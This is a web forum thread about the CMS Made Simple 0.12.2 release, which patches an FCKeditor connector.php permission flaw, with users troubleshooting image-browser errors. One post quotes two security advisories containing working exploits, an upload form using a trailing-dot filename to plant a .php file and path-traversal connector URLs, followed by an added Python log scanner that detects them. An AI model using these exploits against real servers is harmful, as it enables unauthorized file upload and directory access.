0.12.2 Released! Please READ!
Re: 0.12.2 Released! Please READ!
Basically, the connector.php file isn't checking permissions. If used the right way, it can cause someone to upload anything to the uploads/images directory. My 2nd reply above basically explains how to fix it. I assume it'll be the same process in TinyMCE.
Re: 0.12.2 Released! Please READ!
OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon!
Re: 0.12.2 Released! Please READ!
I updated to the latest version 0.12.2 and there's an error with the image browser.
When I wanna put an Image in my editor it won't work anymore. When I delete the code:
require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();
Then it works just fine!!!
This fix is not good I think.... Please help!!!!!!
Re: 0.12.2 Released! Please READ!
Is anyone else having an issue with this patch? I just tested it in 3 different places and fck image browser still works when logged in.
Re: 0.12.2 Released! Please READ!
Yes, I stumbled over the issue.... I got a JavaScript error. The directory listing is missing....
Best regards
Chris
Re: 0.12.2 Released! Please READ!
Was this an upgrade to 0.12.2? Or the manual patching?
And I'm assuming this is IE 6...
Re: 0.12.2 Released! Please READ!
Oh, I patched it manually. cmsmadesimple is in version 0.12beta or so but with many changes. Yes, it was IE6...........
Re: 0.12.2 Released! Please READ!
evoluzzer wrote: cmsmadesimple is in version 0.12beta
Perhaps you should go to 0.12.1 stable to the first ...
Re: 0.12.2 Released! Please READ!
Someone had the same issue while patching a 0.11.1 install this morning. I'm thinking your best bet is to upgrade fully to 0.12.2.
Re: 0.12.2 Released! Please READ!
I didn't have any problem on the upgrade. I already upgraded to php5.1.4!
Re: 0.12.2 Released! Please READ!
Replacing that one php file fixes the security problem - right? I don't need to do anything else?
Re: 0.12.2 Released! Please READ!
If you are running 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file).
about security flaw
Taken from SecurityFocus
and
Code: Select all
NSAG-№196-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.2
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/893.html
Risk:
Critical
Description:
Detour of a filtration of expansions of files is possible.
Influence:
Loading of the forbidden files on target system.
Exploit:
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created
Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
Code: Select all
Advisory:
NSAG-№195-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.0 FC
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/952.html
Risk:
Hide
Description:
The output for limits of a virtual directory is possible.
Influence:
Listing of directories, creation of folders outside a virtual directory.
Exploit:
http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../
http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAME
Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
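A log check for the request shapes in the two advisories quoted above, plus uploads sent through the connector. This is an added example, not part of the original thread and not FCKeditor or CMS Made Simple code; the Apache common log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

CONNECTOR = "/filemanager/browser/default/connectors/php/connector.php"
# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = f"""\
192.0.2.10 - - [24/Feb/2006:10:01:02 +0000] "GET {CONNECTOR}?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ HTTP/1.1" 200 512
198.51.100.7 - - [24/Feb/2006:10:05:40 +0000] "GET {CONNECTOR}?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../ HTTP/1.1" 200 2048
198.51.100.7 - - [24/Feb/2006:10:05:55 +0000] "GET {CONNECTOR}?Command=CreateFolder&Type=File&CurrentFolder=%2E%2E%2F&NewFolderName=TESTNAME HTTP/1.1" 200 310
203.0.113.5 - - [24/Feb/2006:10:09:13 +0000] "POST {CONNECTOR}?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 190
192.0.2.10 - - [24/Feb/2006:10:10:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 9000
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def has_traversal(value, rounds=3):
    """True if value holds a '..' path segment, even when percent-encoded again."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return ".." in value.replace("\\", "/").split("/")

def classify(method, target):
    """Return the reasons a connector request deserves review (empty if none)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/connectors/php/connector.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    reasons = [f"traversal in {name}"
               for name in ("CurrentFolder", "NewFolderName")
               if any(has_traversal(v) for v in query.get(name, []))]
    if method == "POST" and query.get("Command") == ["FileUpload"]:
        reasons.append("upload: verify stored file name and login state")
    return reasons

def scan(log_text):
    """Return (ip, status, reasons) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        reasons = classify(m["method"], m["target"]) if m else []
        if reasons:
            findings.append((m["ip"], m["status"], reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The uploaded file name travels in the POST body and does not appear in the access log, so each flagged upload has to be compared with the files actually stored under uploads/images.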
Re: 0.12.2 Released! Please READ!
I get this javascript error when trying to insert an image too:
Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html
I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...
Re: 0.12.2 Released! Please READ!
You made the patch to connector.php? It wasn't a full upgrade, right?